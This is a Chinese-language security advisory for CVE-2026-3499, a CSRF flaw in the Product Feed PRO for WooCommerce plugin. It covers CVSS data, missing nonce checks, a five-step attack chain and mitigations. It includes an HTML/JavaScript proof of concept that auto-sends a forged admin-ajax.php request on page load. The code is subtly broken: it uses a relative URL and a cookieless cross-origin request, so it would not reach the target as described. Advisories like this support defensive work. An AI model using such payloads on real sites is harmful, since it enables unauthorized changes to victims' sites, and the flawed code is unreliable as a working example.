CVE-2026-3499 AdTribes插件跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-3499

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Product Feed PRO for WooCommerce by AdTribes

漏洞概述

该WordPress插件在13.4.6至13.5.2.1版本中存在严重的跨站请求伪造（CSRF）漏洞。问题根源在于多个AJAX处理函数缺失或未正确执行nonce验证机制。未经身份验证的远程攻击者可利用此漏洞，诱导已登录的管理员点击特制的恶意链接。一旦触发，攻击者即可在后台执行feed迁移、清除缓存、重写文件URL为小写以及删除重复feed等敏感操作，严重威胁网站的完整性、可用性和机密性。

技术细节

该漏洞位于WooCommerce Product Feed PRO by AdTribes插件的AJAX处理逻辑中。具体而言，`ajax_migrate_to_custom_post_type`、`ajax_adt_clear_custom_attributes_product_meta_keys`等多个关键函数在接收`admin-ajax.php`发来的请求时，未进行有效的Nonce（一次性数字令牌）校验。在WordPress架构中，Nonce是防止CSRF攻击的关键安全机制。由于缺失此验证，服务器无法区分请求是由管理员本人发起，还是由第三方恶意网站伪造。攻击者只需构造一个包含特定action参数的HTML表单或JavaScript请求，并通过社会工程学手段诱骗管理员访问。当管理员浏览器加载该页面时，会自动携带其有效的登录Cookie向目标站点发送POST请求。服务器接收请求后误认为是合法操作并执行，导致数据库结构被修改、缓存被清空或配置被更改，从而破坏系统稳定性。

攻击链分析

STEP 1

侦察与准备

攻击者识别目标站点使用了存在漏洞的AdTribes插件版本（13.4.6 - 13.5.2.1），并分析其缺乏nonce验证的AJAX接口。

STEP 2

构建恶意载荷

攻击者编写包含特定POST请求的HTML页面或JavaScript代码，旨在调用`ajax_migrate_to_custom_post_type`等易受攻击的函数。

STEP 3

社会工程学投递

攻击者通过电子邮件或即时通讯工具，将恶意链接发送给目标网站的WordPress管理员，诱导其点击。

STEP 4

执行攻击

管理员在已登录状态下访问恶意链接，浏览器自动携带管理员Cookie向服务器发送请求。

STEP 5

达成效果

服务器因缺少nonce验证而执行请求，导致Feed数据被迁移、缓存被清空或配置被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-3499 CSRF Vulnerability -->
<!-- This PoC attempts to trigger the ajax_migrate_to_custom_post_type action -->
<html>
  <body>
    <h2>CVE-2026-3499 CSRF PoC</h2>
    <p>If you are logged in as an admin, this page will attempt to migrate the feed post type.</p>
    <script>
      function exploit() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "/wp-admin/admin-ajax.php", true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        
        // The action parameter corresponds to the vulnerable function
        var params = "action=ajax_migrate_to_custom_post_type";
        
        xhr.onreadystatechange = function() {
          if (xhr.readyState === XMLHttpRequest.DONE) {
            if (xhr.status === 200) {
              console.log("Request sent successfully. Check if the migration occurred.");
            } else {
              console.log("Request failed with status: " + xhr.status);
            }
          }
        };
        
        xhr.send(params);
      }
      
      // Automatically trigger the exploit when the page loads
      window.onload = exploit;
    </script>
  </body>
</html>

影响范围

Product Feed PRO for WooCommerce by AdTribes 13.4.6

Product Feed PRO for WooCommerce by AdTribes 13.5.2.1

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用该插件以停止受影响的AJAX功能。同时，管理员应提高警惕，不要轻易点击陌生链接。对于关键业务网站，建议实施访问控制策略，仅允许受信任的IP地址访问后台管理界面。